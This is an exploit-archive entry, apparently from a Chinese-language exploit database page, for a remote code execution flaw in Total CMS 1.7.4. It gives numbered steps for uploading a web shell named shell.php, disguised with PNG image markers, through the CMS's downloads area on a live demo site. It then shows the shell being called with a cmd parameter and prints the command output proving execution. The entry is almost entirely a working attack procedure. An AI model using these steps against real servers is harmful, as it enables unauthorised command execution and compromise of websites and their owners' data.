跳到正文
漏洞条目

Total CMS 1.7.4 – Remote Code Execution (RCE)

Exploit Source
# Exploit Title: Total CMS 1.7.4 - Remote Code Execution (RCE) # Date: 02/06/2023 # Exploit Author: tmrswrr # Version: 1.7.4 # Vendor home page : https://www.totalcms.co/ 1) Go to this page and click edit page button https://www.totalcms.co/demo/soccer/ 2)After go down and will you see downloads area 3)Add in this area shell.php file ?PNG ... " ?> IEND 4) After open this file and write commands https://www.totalcms.co/cms-data/depot/cmssoccerdepot/shell.php?cmd=id Result : ?PNG ... uid=996(caddy) gid=998(caddy) groups=998(caddy),33(www-data) IEND
作者
tmrswrr
日期
2023-06-04
类别
webapps
平台
php